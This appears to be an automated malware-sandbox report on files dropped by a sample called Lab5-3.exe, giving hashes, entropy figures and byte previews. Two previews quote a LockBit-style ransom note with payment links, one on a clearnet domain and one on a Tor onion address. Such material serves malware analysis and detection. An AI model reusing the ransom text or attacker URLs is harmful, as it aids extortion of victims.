                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):216592
                                                                                                          Entropy (8bit):7.99918580989138
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:6144:pywqje0t+uiX5BZnIc1HX1go3HmNwovzZ:EwqVOhIoHXmo3Guovl
                                                                                                          MD5:4BD1924FCD1619F370255FDBA1E0855D
                                                                                                          SHA1:D4259AB4B1FE705AAE8F6765A5207214C8761368
                                                                                                          SHA-256:1BD7CD28673B168311577959F10156911AFD59BECA042D7C8C17AB0482CD15CA
                                                                                                          SHA-512:C7CCC1BFE96A673582F6522430CFF1DC52FC914F5AAD2877CF9DE5D6F8DDCEC3E1C4B62E6989FBEDADA927EAA2F02B70FF7F5576C105DFAB7A34542D58D42301
                                                                                                          Malicious:true
                                                                                                          Preview:]nh!E.iu*._.#.ho...P.....'..@B cG....D.....!.`.B..q.......Y.....=......BWY.....pL...1.47[.'d.n~.e...4...."+g{.U...... ..,l..v....@.3...uk'..#6.i;.8o9..p........tg.%E~..5........j...9K...j_1.+G....M..(.........#..@...(.9.!z..v..wez.x.YO...&Ri..'.s.."....H.N....RI+_..&..0/g..=e..P.....I.!f...A@;.R....s9..z.m.Pf......c.}.yX...8...u7+T...5.Us`..n.S6.0...6.N...R..Y.p_...n...K........Y..........Kc..Ol..@..?..)Y<.r./2;.....M..S..2....W.k.b.Yg.<..7......|.P.......w..+...l...|...-.^..!........#.eX.;J_..H.....<Nou;.p..N.F..Z>..............P&...`...4....F..W.[y.y&...d..p.O*N...`e}..W.gEE2-^6.~......W=60<@4...$.d'...XF...).e..`|<......PXi....<...%|.....n..tIE.3h..#.}.......h.p..a/.i..)4S.#....1.=N.F...^Zf....M....Y.XFf^ .+(.i\%..Ps/..4......P....$..!...Q..Vd.YwB.N`K.B...*.u...F.|.2. .{N-AV.~.[._.G.........-..K...Z..c.-..$.....U...z#.Lnv1.4}..n.....K|t}!e..._..3......`.._H.......u.....M.:R;.3.c.....[eb..-...2V!...@C.j.&...A..j.\...T..L.....R8ro.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):10832360
                                                                                                          Entropy (8bit):6.609229703458783
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:196608:Hb84MZy/9sYq0v4TsrYLu9uh3XSbf7DHHNQLrdN:HlMs/9XqFg6u9uh3XSbf7DHHgN
                                                                                                          MD5:406ABD0A86D4A753A901074B95453426
                                                                                                          SHA1:38C09C803D0315643E36338187AFA9E6871DECF4
                                                                                                          SHA-256:AB56BC13BA586278472FADC08055A32185AB9C1C33562BB82FFDD71B5A7AC2A3
                                                                                                          SHA-512:F46F747853BC23F397B29D33F9AD0E87166444E47F6D86947F4638E59BA4C2BC129B7A369821D9DF8C237BE18D2E4A8777BF8418AAEDF4D6A79D2997DCB5F9E5
                                                                                                          Malicious:false
                                                                                                          Preview:.]...t..t.'...iXM.<.4..G..xo. ..Xe.Dg.|.W.c..0..N%..4z.....R.wO/{..%.M.... .hVuSawW.fP.+..............5N......t+....9._......v~.=E.._*.l.;-..:....L...C.'..=W.a..]K&..HP..S.p..;.M..$.MD.,./.L#..<.?...:.e.a...L...v....K.[.:....v.<m..T...8...c.2.5E.X..z.....h.R..h..V..~.....3.L.l...`3"r.T.#......q..W#..}..7.F.*.a.Q..q;.IPv..L..Z.....k..z. ..l.$_:I!y.L...9.7...o.~v..p.[.a..g..O?+..........9.2.kt.t...*c.a..\..v...+.zGR...SK.h!..3.....,..v....U....C.. I.p.....oy.\...Y...s1..p.r...]{.....*.E^...Re..hZ=..4BR.....G..{.L...h.@y.$..` @&.X..^...K3n.r.8..KJpK..x..J.&...6\.S.....?_.7..r4.Z....J..3}...x)T...r.k;N;.4....T....R<.h=..+L....|.8...o..A._.t...!.....e..Go.[.<.....0M.SAi..)ED`.........$.nu.%c..gz..w.A...(..N...{E...Qg.....<..[.....@..50C....J...N..O.b....q..p>fD.$...JG.pp.>?.%....J.b.}.:|...,._......HQ..%.../..![N.?'...D.T...)......2.S..k._......C...v@z.'.~.S}~..E.[$..2.-.I..Sf.....VB...W.,...Hu..!.H.....f..h).-i.^s 1...~.p.>.a..|!..4..j..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):541160
                                                                                                          Entropy (8bit):7.375955370407137
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12288:YwjMyqcTHQCmI39x5oK+xuSS7Odsq3LNq7:YwVqpCmINRn7OdsCLNE
                                                                                                          MD5:E28E6A3104F2B295D5A7A9AFBBF02AC1
                                                                                                          SHA1:7DC7711CE89A5E19E26728B25314C508BC8D36D9
                                                                                                          SHA-256:6A76432B938A7B19DE57FB4B5881A9D2B52169CE24C26DAFB824DB54F709F945
                                                                                                          SHA-512:2C365FA727BA51CF661DA059A55BBDF20A656108480AD2EB6DD2F55689EE15D0247729AB0E4A7D753B4C91F35EEAE70816090721E3EEDE3CA69A154EFFABCDFC
                                                                                                          Malicious:false
                                                                                                          Preview:...?..y8..KDs..0..%..7.L.{:G......'.c.........jT.=e..j.~.=..v...."{.#.s...b.He..n.7..OY..k........Oi-..&.w.s(4.(e..x(....0....!9.w....3..|.......C...2..;.q.F...vz...Z..wr.........b..va6..V9T.....@b.h.$..hL.S..&w..}wA{.G....f..H.NW.h{/u}...v.|a4=.<.l.Wz.6.-ec..u...`Q..yI..C.s.>d.Nr..~.....&Bf...>. \kgY.-..ZR.*TW...?dK..,x'...5.Oq.F.U}.J-.^..=.G.....g.....".....=j..z8...$O.....I...]w.{.)C.......gL..%....:........xx..JK/..U....Mcl=g.p.e[.<`=.THNB.<.....r.._:..`..I.....t6...4f.A..$..........bP2....N0..(N.V....V.{".!...-..b~.opA.8.)Z..a.....7.B.e#....Zw.Jy..&K...0-....Rw.l_E....!.......F1....{=.P.+s.H.....f.*-.../....?......^!a.....%...8...5/$.I...3..c..@..G.S.E...].O....d...!..H.h.~n;YvU.../.O."...v...N.Z!.Om....s.Ym.._9)...U.Y..d...&).C+....F(.8......j...|.P.~...9...#:_...r^...*)l.|.........<../Y..:}.)g..:..v.gbE!.....d.....Z..^>.....d..T......w.Q..,4J_..w#.g&;...W-W.q.=....>.B.....s...C.....z.J..[.EpL.S...K..l.Lr...l..C.....C]...d..-
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):402408
                                                                                                          Entropy (8bit):7.6052862526950475
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12288:jfLX0jZ2L9FC2RANy+Fu0lVZyvBaEpyiiUUgB37NEiwVx:DLkkL9FHRpczy5PgiiUzBLhSx
                                                                                                          MD5:8617FBF07488436E0999EB87C2C6F7E6
                                                                                                          SHA1:C9E99FEA21A9BF0C6E70A9785C5792D9DDDC74B5
                                                                                                          SHA-256:54F6087A9314B6B7DA57BFA32145777C2A35DA57D04BC622C057E0BC2A0903B3
                                                                                                          SHA-512:2A1F1B98705F5FF20F0E23F8BF5FB68852CEAD832624E78316579E94EB655C6E5A6E15EB828A3168FA4B9B3F0032B8F1C96AB6F0675449F7E6EFC5F302D25804
                                                                                                          Malicious:false
                                                                                                          Preview:..4....`*Y3r.Pb?...`...{.d&E...>P..".b...".X.+.M......O7.. .......w..%.A......`...t.n...o..[e$.1..ZQ6...R.};-.2..E..&....5.S..b.#:..(1.C...r.W..n.e..C....l.0.y..G.....A......./O...........z?d......?h...S.h]k@.cI,y..on.vk..I....pm.....X^c.F........t.>X|.....uIU...T......K<..'.S.<io...Z.........'....S._..V6....4>..{v#...%5.A....O+V.Y\...(..@......-.[y.e...,~DG.c$.....d...U..T3*.u.Jj.N.a.\...kUu..xd.4.......j.>..O..iO..6....d/..=.....X[_1.\....d...(E'.)u.Q.;.. ..s7... .!w..Z.L.:.l..........5.jS.H:{Q....6.$.......n._W\..tf..;.z..#..S.U..{.W..uR.....2..XO......._..7...u|...|......&.e.....O..d......p...f..T5u....7...}..0..xJN.#4Lo...|. ...@....*.......4...z.Yd.n...//U%.y;..aW.|.wg,...]J..h..K=.....8.6i..x..N_.zA.fZ...4..X)g....I........6..tq0....kU`5.(....A...9.Bu*{.D._>_..a." Q.lo..pT.`..,Y..{.........`p.....;......k.....*p..P...I....ga.K.....j..t.1E..1}..`.&Lx...o..9..c....D%.a...1%......cm.1...M..e...#v.V[w.....}HYSC.N.."fq.O.%._....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):654824
                                                                                                          Entropy (8bit):7.292121873186676
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12288:UcpqSiKAhiM7AS4kYyY5pyd/Etx0wcDALkXBIDsbin+U:U0Ah3ASYyM0cx0wcDACVi+U
                                                                                                          MD5:D8AB97C9AA18239D9DCCEFC05BAE04FE
                                                                                                          SHA1:2F50012C01EA5FD4192336A98E3ADE17CABFA555
                                                                                                          SHA-256:F0CEB402159AB10A769B226857088C6AE1343755B5FFB7A7B8F6A17A66989634
                                                                                                          SHA-512:C3936E2D201FB0802D127C11D4E0A8D424A1EA3A284B9EE5DC156639DE29724A4D15F50AE471E1E454018567621212A44583DB5A5B9A4083684DCCEBF831F515
                                                                                                          Malicious:false
                                                                                                          Preview:.....~....0!...oj.r.0.Y.d..#.%\j<...U}G..f ...D..?'.....H........c..`...sv..Z..b8.s...r..@.18...`\..7....bB..@q.6.j.M.<.)lu..&h?.4...K..K:.?/s.(L.^...,.c....-/2.pb..~.......1.....dkY.R...g.R....x.Y.K...../p\.9.a.94c....o.WZ..~..5..xi........g....7...Y|.A.\.{k...Kt.$E\{....+V|$..... uP.m....rr?.:%... C.+v..M.w..3.wh=.wt.G6..}u.l.....*+..{.k..T.>.&.#.4h[..)....c..."6.I..A....7a.wJ...!@..E[..f...Q.N._fT..j....F.=.Y+..i..P..b...........[B.|7.....m..%..._".....-....w~.s.KF.aR.|.....XY..}.....\n.G6xa..t....;.b....-....%.`.K`.PS.T]L.7Z..IuF...7..........D.c.....g..@.<S...-....Q0.a.:../px.QM..U....ELO.0C.....K?...%9...-TvB...u..ZI..|.."..J.Mf.;L.N..O.j..BA..~....YK.'N...d7..E..7y.Ok.g4..<9.M...u1#.AdN..>{*.(pT4...n.e^S.x..\N*...L$C..`.PEb{..a/6.%..n..........Z.^W3.....u...A...}..#2.[4h....6.......Ua$.:...C%.w..t."2.<..w...v.m...?1.IHa..#.b.....wH........i2.-...L..|D...g.O....!Q.8.U..D%..vWy..;^...'.4..>...l...M}.,(p...K;[zwk.+...oQ.......h/.s...O
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):188384
                                                                                                          Entropy (8bit):7.998901450889623
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:3072:16SFWfH1pjbM9RdIwvAdnEbSPbjKIUdmnEi8g5IRf6y3/vk40TvbNjQReX7rQPUj:UwOiRdIwFSDht8gORf//vkjpjQ0QPUiQ
                                                                                                          MD5:0E9B491585F88646AB5CA0DFDB4A5CC0
                                                                                                          SHA1:DEA806996AD63AD24DE1D35B67E6613A5EBF14F4
                                                                                                          SHA-256:FD8CC1E13CBDC4B8415EA4C4FBD4B428C4295940E20EE49AD5EC50E8A5B2931F
                                                                                                          SHA-512:B7B475B5F5CAFE5235B59058BA75772DB21A0D39540E61E027EFF878CF52398F4FF42C9C821EE3FABBE54F9BDB7C144C1EC420B928E26198A7BE67432906D31A
                                                                                                          Malicious:true
                                                                                                          Preview:..t.....+...ou*".!..c...N9z.Am....v[.....qdl...}.A.4.4...2.w....J9. ...9.#wYg.=P.}.E....].......)l.0.AM.A];.7...\...-.....4.h.t?-m....=..m..|0.RQa...l+..t.S{.C9b...;....e..hK....!....{X.......K...._M.O"..V....i5.(.....C..r/.fb....S7cn.\7...{I.F.?.M..C.2...}.P....LY.......z..7.p...r..[)u.h.5M.!%.dQB...(..D..s|...dN..E.s....[.3.z....m.1C.%@..z..d..4.G..0..S.TU=....U.0oo.La@...r2F..r...?&..T...#..L-....Q.XF/....y ..5"./7.GK..O.<..B...8`,C.._!X......G./l.......~..)..2.........g.m.....F.B9..u....f...h.Z ..r*.N.......Z.9...y.0...R..v^0......+...O.....n..3|.^u8.?....ru.....8!.y........).4G.....K.._(.y5.$"..4.+.........c..../....V.m'\. .A.....y.i......i..T.#..."....*....a....>.."............>.e......i..rir4N..@...B....Ba..iq../.{u..X....R(....` ._.!.L.$rP..n..Ud.....eQ.).J.qx.5.......?L.-..c%.. .JI....e......H+!..}.#..]...bgC...t...;z..;,.....-......w"c....:...A/....,R..-.....*.Q.F.F.v...EL.p....#$.@.xd.........HH.P+...)..Z.6YN..>......-.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):66528
                                                                                                          Entropy (8bit):7.997347415892986
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:t7t0jUuZiRDRxMXzZt07hX0eMT13t3UnBEIKJqSpxLp48Z:TgUuZiPxM707V9MT13tknBxCLC8Z
                                                                                                          MD5:0538D6AAE6779581021A158CAD795F82
                                                                                                          SHA1:D5BD93237CB9D66BEA6C2404732DAB63012A3C2F
                                                                                                          SHA-256:8815201E7A21A711CC5913FFDABFA06924A68271C3DE4E647347C6A665D0C080
                                                                                                          SHA-512:F11E21F5891BC6F3D04D68111173417BD7A8B1D09C369140D21DCFDF0D53F70E5394BDFFB7C9F9EBC604CAC1783ACA0F584E2F6983D79235AA6FE759D2A543D6
                                                                                                          Malicious:true
                                                                                                          Preview:._C]E.{..Pj5...t.hpTA.7....N..[l..S.z..s...vGZ:..W.K...Px..3z/l.b...4......F..7..B......:.dnM.V..;..6..8..".}.ko..q.....)..cuR.n..Z./.@."...<...8..5o*}.^_/QC....nu.....A~N.y.._..?......p..e.b...u..#...2.}..oOBme..f.$..[.D..@.!.xWz..n:.92.Lb.....C..`........<.:...+...)?+.!.U......\QE3.....v.#....^^.U.<B-U.5....#...B...i...<%.....z..Z.....0.c...Bkq.&..i.<.y.,.=.v^V[ ..N...5i..[N............f.....:l'S.O.5..U....c.p....V..*!\.....5.Igq..G'}..53:.S..k.<...6jWDd..i{r.r.4..._0.9.....#?.M}i'..Y....Q.REH.>.kGQ..2.G9...>.....Tv.....C..L.HXV .$.....*.R..^.....oS..%.M....|I.wlk..p.g....CiF.D!+...C.J.........,...R...P..[u.!.(.w.h..4....M...(_..2...$.p..AD.y.?.{....^.b.b.3q&.Ef.8[...,...^..F6-..d.DU8.......<.H.4e.Z...L.0.,./.....(.r.!.l..U...F..f.v..^}...Z..X.R..,s.$....,.=.,7.Q...oM%...\H..V#..f.k....C3>.A.N^76...k[._jiI........i.<...]..Yv...:.11..P[.X=t&A..[.!..s!.U.m........i...]=....M..3..VKc..../.....v.....Z.?....W,.0&..$W`......d...v..A..X..._%
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):452072
                                                                                                          Entropy (8bit):7.171561656646433
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6144:wejFz+aUfOt1TnywbdnGrMPQNffozO29lTmZaPvUE/dLQxof//R1BZ:fbUqXkf4OY1MaHr
                                                                                                          MD5:20E2E2C3A4899CBADBF96BACB48E84A8
                                                                                                          SHA1:D3BBC41618B060BA9F27431EB5CA1684FC647AFA
                                                                                                          SHA-256:A695101568C15B44314B1A222434D2E68B6CB72BE97F1DB57D48F3DBC8087F53
                                                                                                          SHA-512:A47DEC6270784A4186BDEAB7B8133A56A5EEA20252A0A94D4FFD0DCE25FAAF4A68590957FC33C8C75416124D6266136902A274E4C39DB7893C3325875CC8C9F4
                                                                                                          Malicious:false
                                                                                                          Preview:......g,..........(?|..hNG.ol......A...U.. ......f.._J..J.....o..r..wa.f..I.V1h.j.;.m..Q..S.5$..B..]..ZH......|..j.8.~...Dc....].~....p.X.R....Y.....*..`z5.......Z........$Fh..L.3..<..n.L.*..`G...N..c.r.]....S.....:@.|.E..w9`=.%.....n........n......5pry.........Ia......u....4...#.N...X....B4u......}..4V...|........t..+3...g.#.s...R..4.j.7..v..Cna;...&.[.8.i1..t..kE.....J.rie.;..Mh,*.+r.}^,.,.?....Ob.-a....-.nB.8 ...G.g.i...E. ..f.....)..s,.)..jK..I....-fc.VA.h...wHN.......?Tzg..VTWv..1w,....t.w._s{.R.*..o .RY....I.,.@..6...{.-.AS...F...........!.L.&.E..lB...]-3tV..^...m.....44....{|.y.y......@,9w......~.(e..x..Q.2..-.y:..{/|.......4.8GOL>[..UDKmG.Br.......y<.,..?......J..e...r..~...m.).f.EfF)|K....x...G.J..E.7y.......~.O_.wuR..6T~9e.....(.mA..;JX.5.....r2.(.....`.0i..5...KN.b....i....P...A9I.|.......F.Pf..<...U.[rsH4.4j..lw..Oj4......H7..6......G....K.4..e....Eb...8...}.}.....6-...r.0.[..0...H.d.\..(q.(..I..e...B2..o...?o."C.|054
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):376296
                                                                                                          Entropy (8bit):7.700072715060322
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6144:7jm9dw8mxCO+vQWu8YsL14j+K7H/A1VLPCQLCOIjU/NNdeNfQVbeSFzvJKNb9eH4:nm9dpmjNWjYw4qCH/A1VrCQeOIipaSFm
                                                                                                          MD5:118A326563B1A489EFD6F23BEF11AC7C
                                                                                                          SHA1:7C0D3CDB14F4C5D6DD0EA0AF7219588403E7A609
                                                                                                          SHA-256:D9C53FDB4127C3A3055E633992F585F8FB7E187041E579E329021FD52C5A8CDE
                                                                                                          SHA-512:9257620A224D727647E15F4410A3029DB279FA763EBA2438B347FDF0695FDFCA89E3750C4F36D5CA3BE80F7F8A5E5A22A71900FD7B4C83B959817E6B56094D9D
                                                                                                          Malicious:false
                                                                                                          Preview:.....]o...z08i....P._..i&.....3..6..4..N.|....Q...z.......3&<v.7.......2....h&.D~|..<.#..E.........8./..J;9Zj:..)G.y...._.l."+..^..@!F...@/......s..=N\.w.l.KI.t......B..QP..~.....4...._gH.......P.<.Z..w.v>..vo....u1_D_5LKn,...x...y.{,.zH0.I.72...X#...|...<.B.$.....]...{.+.E.(...Q.......fR.O.U7/(:X..T..+oaO.{Z..4..TG.n...`bG.....;.K.+B.;o...!..P5.V...|?..}1i`...m.lA...e.V.N....?/f.z.Bz.9.k.?`.k=2...u.N....Z..b..0I.....p"0}..NZ.....I&H!....i...?.{...sT+u.?.Y....hUB..yM..Pl=..w...5.:.5.....C.....;,9....1,.e....j......RVCK.g_.Ij.C).V.....[.}..V!c.1S...=...O..;.@'.......<iqb\.Q....^v.p.T..&...Dj8F...(.+6...#.e..hu.>.3%a.('.IV..m....~..y.....=I..+...\bhz3...->.|..^....X.Bh.x1..|$P.....(.;.o...l.j.L.u..A.|...E.9.S.o;...)!..c\..u.Jk?z....LC.1.m..]|t...>}...`Y.A;m.....6]E.o.6q...5.-.+Dg....G.`.-..I..}S..cgI..kE@..o..jK.z:.......b...y7.a.(.C.zp.Cf.J.{.?.a....b+.?.....2......*.O.$6X.s.n#.l....C{.O.jg...F8.-*.....@.i.J..w..vA2.CN..e...2..h.e..~.......=)....y...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1984
                                                                                                          Entropy (8bit):7.921081118407957
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:GIYWcwimQ6CuayhsaakNHfUTid3hBaUoSGFcmeykEdEElU92i:GNWuZyWxkmGx0uKeY2ElUJ
                                                                                                          MD5:6265F10575785629172B96C5B6F89CB5
                                                                                                          SHA1:B8003B3EFF1EC08D540918CBF99248936DDB96A6
                                                                                                          SHA-256:EB09ED2C6E060FB42FB0C24ED38CD0D96F1C428BDCFC04A9325877ADE4D5B1F1
                                                                                                          SHA-512:5130E5B90ADFBFADF84A615A34ACDCA6BC707977DAF384ADE8F4EF70B13FB366BDDDBB517427AD7CECB2DCE03C757823B84D4CC4C0C3F9147BF2B5A1320D150F
                                                                                                          Malicious:false
                                                                                                          Preview:.KBq*...q.....U......S."...E9.t.p......DL.j..Pb...#..u.}....Y.*...{8."X.=.5.%...C..B.....e...fY.=..:..h>|../....W..n.D.q....}7...............q..X1.;..7....j....[.+.'..7H.f.t.....\M..6s....8..n>F#..FF1..uF|=..h..|`O.F?.v..!SXvz...&.. ........A......9..=eR...h...\.M..!..G.........S....b#.ZN.T.qF.b.... ..]@9R..d..ay.K..q.......`......OWw..B.$.....Dj.kp..|.?...,.[I.S..B9RH.R.O.gB]...?e..........oq...!...].5..FA ........7g..D..O..C}$..r.V.=....nY...)......>.;.F...XY..,....N..]x...5..7..7.R.....]..n?.q@..F.).&mf.R5..*+..R.@HQ...M..m..'.\f.Z.G../..u$.,..&.....h.!....i\f.E.{....W...e.Q..G.Gw.Pq.m>.\.....x.k..3...c...l..< ..yqS..`.0.V'..S...H...R..i.....w8...^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1856
                                                                                                          Entropy (8bit):7.906797263077628
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:iiIYcb9OE6tKFDbFHfUTid3hBaUoSGFcmeykEdEElU92i:iikOfGDaGx0uKeY2ElUJ
                                                                                                          MD5:63B3EF98C2ED726342DC1F9AF73BBD19
                                                                                                          SHA1:71396501F2768A2B7FA389C0676249A7E9D05934
                                                                                                          SHA-256:A0C282391E7AFC22281A6CC3BDDD0A0A507E5B33FF374F68A5CA3DF4ADCC6181
                                                                                                          SHA-512:C04C9B07D1A64B543746F309C64FD7C86E84B7B85C2D6CDD33C47BA726831F4E6037D27024535D6D38B628C140098ACA94DEB11B6EF50E2F16F4645D206BE995
                                                                                                          Malicious:false
                                                                                                          Preview:..?...!....B...n..1e...?gKcUl6.....RY,...N......O98gj.<....YW..W....{.=Ur.dm.L...{..p..?...x_.URz...p.o.nJ....].m.........y;\..6.#.T..s.F..b.........~.......t_...#......n.Z../x.Q.3.,..#_.....C..v..;^.!t."..l.8{.#..m...Wb."]...o.H...z..-.....{..$...7`.!....._.A.._.....!...9.&.*..MSz..V...h..4X.4:..6M..]./..z;.28.Q.)..=../...nA.E..!...'....R2U.;.............D...|s7.-.i..'I.P...#.......O...%.........(.^r;.!.F.>._...%O.4..h..;....P.#.gO...2,......).d../.7.P....r....n...u.lh..ik..ct.....(g.V...*$.:h.K..|<.#..&....-.....^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):9792
                                                                                                          Entropy (8bit):7.983668091705875
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:9P3skr3npXV/ApUSSdgT8WxeSBR1QMiX11SRxCCN9KIjD0Cb:F5r3pXVwUhdKdj1D0SRoQoI3tb
                                                                                                          MD5:9E9C57A3339D23BBD13B562ECE528D26
                                                                                                          SHA1:2237C43B15C958A371C6D99DFB4A21B3BCDE2105
                                                                                                          SHA-256:C657881D4AF6BF7C8FCD3EE2C4DD7A1374185ACD7D3E7CD3E4AB7AAE5A27BADB
                                                                                                          SHA-512:CD6D05D1149AF2015FA9E0F4BA7ED7A568EEA1752D89E43A65D93F5AE1359098B8B8B5F3E3C25AC35D587B410F65BD8D853EA299F0CABECB4FAAECF7C24A3D2F
                                                                                                          Malicious:false
                                                                                                          Preview:........y.......wo3.V.+..........x...^,.R@vx...B..cY..m....6.r..X<.m....w..rJX2..V..p..6......"..9.UN...........|..c..........lT6.g.....48.E...L....i.g.h..8.'...Qs.@.........;...j4......i.NM"..P0..PY......m<..].DA...F.b.g..fIx..!o?ol&.X...M.I......].....&|Q.HWB...2.g..C...y&.X....:Z..?.&.`.'..Xk/.X.:..oQ.P.......|.l'...>..w.*...Sr.I..5E.suZ.U....uu...j.l..P..`Bws.......2....Y..~)..7.%L.$.<.N.K.5.U..A....%d..9...].?..xr........,..d.z.`u.@W#V(....)f/..a..r.'.A@.S.....Vy.tW.e.PE..B;I..>5.M. ....S8..K.....~...M#H....C..KK.Uh+UF..2C..S&.<...;R..RW......-z:MQ...e.:.7..l........[.......q.G..V.8..}.v...X.....fWf..j.,.k.*...\.$....h.............ib......j......f....G.$u......X-Zj..t.".40.U..x.r.'9z...F.>;Hf...F.x..F......"<.p.5..N.<....Wq...L8VV.....*+Lx!...3m}.yU].4..W..if.L.grY>f>.J.g......:...'2.!..T...|.e.>.#..[L.Y.F%....o+...L.o}:.B..^1x11)..Ui.#...y..d....z.=...o....w...F.HS[...>...Hk..B(..)e5....H.oT5......{5.....W..3.Lr....e...S....."y
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):4320
                                                                                                          Entropy (8bit):7.958173564389968
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:nGhhGwf6mHYxUeQr1zMbge/qGx0uKeY2ElUJ:GhhGi4xJCw0e0Cb
                                                                                                          MD5:9210FDD860B76F40B5EB70B40B470B17
                                                                                                          SHA1:FF56A9B50EEAF87F2D444AAC1BFF7E2034281533
                                                                                                          SHA-256:25463009814F404FE8DB039AE60AD3F47354CFF529A5FDB7CD91A5B8FD6CC858
                                                                                                          SHA-512:C40DF200A92EE3FD472C7ED815AAB4F4A7E8BFC2182315F74563F2D628A2C355BD5F2A557FD2458542AB782E3D0742F33F94366345F98C20A3CD92988C4FB04F
                                                                                                          Malicious:false
